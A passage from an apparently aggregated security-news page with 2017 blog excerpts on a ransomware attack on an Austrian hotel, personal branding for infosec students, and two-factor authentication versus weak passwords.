Austria's Alps. His hotel's electronic door locks and other systems were hacked for ransom four times, between December 2016 and January 2017. He paid a ransom of two bitcoins, at that time it was about €1,600 (£1,406: $1,882)". He’s trained his staff to recognise phishing emails that may seem genuine but actually contain malware. And he's moved back to traditional metal keys. Lock out: The Austrian hotel that was hacked four times \| BBC The restaurant that didn’t exist People increasingly make decisions based on what they read on the internet. There’s an inherent trust about it. You book a cab through an app to take you to the airport where you board a plane which you booked online, to go and stay in a stranger's apartment you found through a different site. But it’s a fragile ecosystem that’s open to abuse, as one freelance writer discovered when his unique restaurant beat out thousands to earn to ranking well on TripAdvisor for a time, drawing a flood of interest. The problem was though, it didn’t exist.	Guideline
	2017-12-20 14:00:00	Building Personal Brand: From One InfoSec Student to Another (lien direct)	Finding employment opportunities as a student is challenging, this is no new fact. Students are consistently facing troubles with seeking internships and co-op opportunities. I myself am a student, and I have found a solution that has been seemingly effective for career development thus far: personal branding. Personal branding helps students compensate for the work experience that we just haven’t had the opportunity of pursuing yet. Personal branding includes building a personal “brand” that people associate you with. You probably have already started developing your own personal brand with personalized resumes and cover letters. These are essentials that our teachers always told us that we need growing up, and this is true; however, it is 2017, and with more students than ever before, the job market has become very competitive. The opportunities to find internships while an undergrad are still very much existent. We are going to take a look at what you can do to break away from the job searching norms by building your personal brand. Personal brand plays a key role in developing your identity of an aspiring security professional. This article will help guide you to become the nontraditional student that you need to be to land interesting interviews. The pitch. “Could you tell me a bit about yourself?” Be prepared to respond to this question comfortably at a moment’s notice. Know what your personal selling features are, and strut your achievements proudly and passionately, but not arrogantly. Knowing what to say in “elevator talk” situations allows us to network on-the-fly at any given moment. The resume. It is an obvious expectation of any serious employer that your resume looks good. Your resume will act as a professional summary of your identity, and employers will profile you accordingly. Dedicate some of your efforts to ensuring that your resume effectively and professionally reflects your skillset, goals, past experiences, and projects. Keep your resume up-to-date, and actively rework it when you can. The business card. Some people may consider a contact card as overkill, especially for students, but I disagree. The need for us to differentiate ourselves as students are becoming increasingly necessary, proportionate to the number of students being pumped out by academia and other routes for job-seekers to educate themselves. I printed some contact cards using VistaPrint for my first few conferences (DEF CON, Black Hat USA, and HackFest), and I have received only positive feedback; in fact, the CEO of the cybersecurity firm that I will be interning at in May was impressed, responding “Wow, this kid has a business card? He’s serious.” The act of handing someone a contact card alone	Guideline
	2017-12-19 14:00:00	My Password Pal (lien direct)	“Sorry pal, my password is Spring2017. Deal with it.” Someone said those words to me the other day. As an InfoSec professional, I’ve have grown accustomed to this type of indignant proclamation. My jaw no longer drops to the table anymore when I hear folks speaking this way, but I still have trouble stifling an audible sigh. As usual, when confronted with this reality, I experience the usual stages of information security grief. Why don’t they get it? Where have we gone wrong? Should we give up? Who still uses the phrase “Deal with it?” Fortunately, the statement made by my password “pal” was in the context of getting set up with a Multi-factor login system. I have been a strong supporter of Two-Factor authentication for a long time. I even took the bold step to predict that at least one social media platform would force 2FA on all their subscribers this year. So far, this has not happened, and even though no one is forcing 2FA upon their subscribers, it seems to be getting some attention and adoption in many corporate settings. In fact, a new regulation in New York is prescribing multi-factor for all remote logins unless the CISO has approved in writing the use of reasonably equivalent or more secure access controls. What is the meaning of a “reasonably equivalent control”? In InfoSec, we call those “compensating controls”. These controls were introduced in the first version of the Payment Card Industry Data Security Standards (PCI DSS). The standard definition of compensating controls consists of 4 parts: Compensating controls MUST: Meet the intent and rigor of the original control. Provide a similar level of defense as the original requirement. Be “above and beyond” other requirements. Be commensurate with the additional risk imposed by not adhering to the original requirement. That is a tall order to fill, and it seems much more difficult than instituting a 2FA solution. There are so many multi-factor options out there today; one has to wonder why people aren’t jumping on board with these systems? 2FA isn’t limited only to corporate systems. Some tools that folks can use on their personal accounts are free, such as some of the “authenticator” applications offered by some vendors. Some services such as Twitter, and at least one security organization (EC-Council), are still using text-based two-step verification, and we know that isn’t perfect, but it is still better than no security. A 2FA system eases the sting of bad passwords considerably. Now when someone tells me “that’s my password pal, deal with it”, I no longer have to sigh. While my internal cynic may respond in kind “well now you have 2FA, so YOU deal with it, Sparky”, I am comforted, however slightly, that an attacker has to jump one more hurdle before he can log into the account of mister “Spring2017”.

Last update at: 2024-04-25 10:08:02
See our sources.

To see everything: Our RSS (filtrered)